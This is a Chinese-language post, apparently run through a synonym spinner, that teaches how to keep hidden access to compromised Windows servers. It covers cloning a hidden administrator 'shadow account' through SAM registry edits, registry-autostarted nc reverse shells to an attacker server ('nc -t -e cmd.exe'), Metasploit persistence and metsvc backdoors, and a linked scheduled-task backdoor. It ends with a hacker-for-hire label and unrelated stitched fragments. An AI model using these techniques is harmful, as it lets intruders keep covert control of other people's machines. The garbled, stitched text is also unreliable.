当咱们在浸透过程中经过缝隙获取到方针主机权限后,往往会由于服务器管理员发现和修补缝隙而导致对服务器权限的丢掉,所以权限保持就显得很重要了。
在windows主机中,我总结了下面几种权限保持的办法,不足之处还望各位大佬指正。
增加影子账户
影子账户能够理解为和主体如出一辙可是又看不见的账户,其隐蔽性较好,只能在注册表里边看到。
首要,咱们需求创立一个躲藏账号OMG$ 运用指令 net user OMG$ /add 即可。
注:躲藏账户是指在运用 net user 指令下看不到的账户。
翻开注册表编辑器,找到HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/选项,双击Administrator记住类型下面的十六进制值0x1f4找到左边对应得文件夹即000001F4,双击翻开仿制里边F下的一切内容。
同理,翻开OMG$对应的文件夹,将刚刚仿制的内容粘贴到F 下。然后将Names下的OMG$和000003EC导出注册表,姓名随意取。接着删去OMG$用户(net user OMG$ /del)。最终一步,导入刚刚导出的两个注册表即可(双击即可导入)。
刊出当时用户,运用OMG$登录,发现登录成功:
NC自启动
咱们能够在受害主机上上传NC,并修正注册表将NC增加为开机自启,不过这种办法需求有一台公网服务器或许将本机端口进行映射。
先来看一下nc的指令:
首要在服务器上开一个监听端口 (nc –l –vv –p yourport):
然后在受害主机上履行nc –t –e cmd.exe ipport,能够看到服务器上现已接纳到来自受害主机的cmdshell。
现在需求修正受害主机注册表,将上一条指令nc –t –ecmd.exe ip port增加为开机自启,这样受害主机每一次重启之后依然会自动衔接咱们的服务器,不过条件是你的服务器得一向监听相关端口,有点鸡肋。
MSF权限保持
运用MSF保持权限的条件是先取得一个Meterpretershell,经过Merterpretershell获取持久性shell的办法有两种:
Persistence模块
首要检查persistence模块协助信息:
运转run persistence -U -i 10 -p 4444 -r 192.168.34.132:
-U:设置后门在用户登录后自启动。该 *** 会在HKCUSoftwareMicrosoftWindowsCurrentVersionRun下增加注册表信息。引荐运用该参数;
-i:设置反向衔接间隔时间,单位为秒;
-p:设置反向衔接的端口号;
-r:设置反向衔接的ip地址。
重启受害主机后,shell依然反弹会回来:
Metsvc 模块
相同的,先来看一下它的参数:
很简单,直接运转就能够了。
从这儿能够看到,它是经过在,方针主机上敞开了一个服务。
监听31337端口使用handler下的windows/metsvc_bind_tcp模块,从头取得shell。
Powershell权限保持
这儿引荐一个powershell脚本:https://github.com/re4lity/Schtasks-Backdoor,运用办法见Readme文件。
[1] [2] 黑客接单网
192.168.123.150 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 f...
print 'response code: ' + str(r.status_code)2、到Google,搜索一些要害字,edit.asp? 韩国肉鸡为多,大都为MSSQL数据库!3 假如自动使用或...
扩展性强,能够让你加载Burp Suite的扩展,运用你自己的或第三方代码来扩展Burp Suit的功用。 功用 3)测验直接上传asp脚本文件CSRF(Cross-Site Request For...
我之前一直在深思 怎样能让别人在社工你或测验社工你时及时发现或防护 并且像正统侵略相同能建立一个蜜罐等她上钩 大约想到了这几种好玩的tips 各位如果有奇技也能够放出来一同评论 1.在各大论...
① 环境搭建COUNT: 20cd afdko赌博输了十几万还能回头吗, https://www.biantube.com/watch/LBgIKqdfF1k该token字段包含不可见的某些位对齐子字...
1.1 组件称号随机化 public class ResourceHandler : IHttpHandler { /// <summary>变更为:...